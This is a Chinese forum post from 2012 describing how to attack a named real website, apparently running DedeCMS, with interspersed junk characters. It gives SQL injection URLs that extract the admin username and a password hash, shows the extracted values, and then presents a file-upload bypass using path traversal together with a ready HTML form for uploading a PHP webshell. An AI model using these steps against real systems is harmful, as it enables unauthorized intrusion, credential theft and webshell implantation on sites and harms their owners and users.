①注入漏洞。
, W$ C- K5 Z8 ?& X) ^) L, N这站 http://www.political-security.com/
+ |) z5 E7 C4 g首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
( g& V# q1 o/ U3 qwww.political-security.com/data/mysql_error_trace.inc 爆后台5 t, C; F/ |5 ~
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
; y! E% J$ r% [4 s' z4 }. U7 @, W然后写上语句
! U7 L, C# }2 G, t, P& A查看管理员帐号
9 ~: c- B% g! o$ [8 fhttp://www.political-security.co ... &membergroup=@`+ P. v) T; c1 |0 Q# n! M' }
' p$ G S/ E; O/ Q! c
admin
5 a8 P2 W: T( d$ W0 `) c9 L7 ^- {$ z
查看管理员密码1 d- z2 x4 @% l a
http://www.political-security.co ... &membergroup=@`
; H7 {! h1 A/ \( B2 F
) W7 w; L5 Y* R; W1 k) p* h8d29b1ef9f8c5a5af429
- V! X: N4 F+ H# u0 w
0 L# y1 k6 H! H( G查看管理员密码
0 Y# k7 T4 r R! @8 G
- n8 X+ R" @. r9 u+ i* O9 S得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
. n8 F J- s: |+ O# Z; [/ l# }( ^: G8 j3 I) P. T6 r' w, [3 c
8d2
" Y# s C' p7 M" B7 h4 C7 _: {$ B9b1ef9f8c5a5af42
* c: n6 O+ O5 l( D. g! l5 H9
( R5 W4 U* ?; w: Z A0 O' \
7 V2 a v8 \0 W+ ? }cmd5没解出来 只好测试第二个方法1 M: m8 M* Q( x m1 B
b% u& X; e" Z- N, k
T3 `" H: n! f
②上传漏洞:
" i' f% \% U$ r/ Z. A t3 n' |* {# F1 u1 b& m
只要登陆会员中心,然后访问页面链接7 e* o: U5 E3 w, n
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post” N. O8 Z+ x* r& y# ]& a
$ b8 X+ A- L+ ?! T6 f: G如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”$ |4 I% f; e! X9 [# c0 y/ ]
3 Z+ a& I2 @$ v4 L/ \3 P7 K- l于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm; K: r# [$ \% u4 A1 B7 ?; j
" A) @, J& x5 K2 A! A
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>+ _2 L0 f8 |! t8 o2 m# M# a
或者
0 N/ o# i s9 t/ w" }$ I即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对